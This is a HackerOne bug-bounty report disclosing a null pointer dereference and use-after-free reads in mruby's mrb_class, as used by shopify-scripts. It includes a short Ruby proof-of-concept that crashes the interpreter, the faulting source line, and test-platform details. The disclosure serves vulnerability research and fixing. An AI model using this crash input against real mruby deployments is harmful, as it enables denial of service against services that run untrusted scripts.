shopify-scripts: Null pointer dereference in mrb_class

2017-03-24T17:27:15
ID H1:215891
Type hackerone
Reporter dgaletic
Modified 2017-04-15T14:45:08

Description

PoC

The following demonstrates a crash:

if def class
  A
  ensure
    e rescue 0
  end
end
[].map.a

Debug info

The crash happens due to a null pointer dereference in mrb_class, class.h:50.

50├>    return mrb_obj_ptr(v)->c;

Valgrind shows several reads inside free'd blocks.

Test platform

  • Linux Mint 17.3 (Cinnamon 64-bit), built with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3

mruby SHA: 051e40c0493f2de332f5439e3230c9fe6958bf1a

Thank you, Dinko Galetic Denis Kasak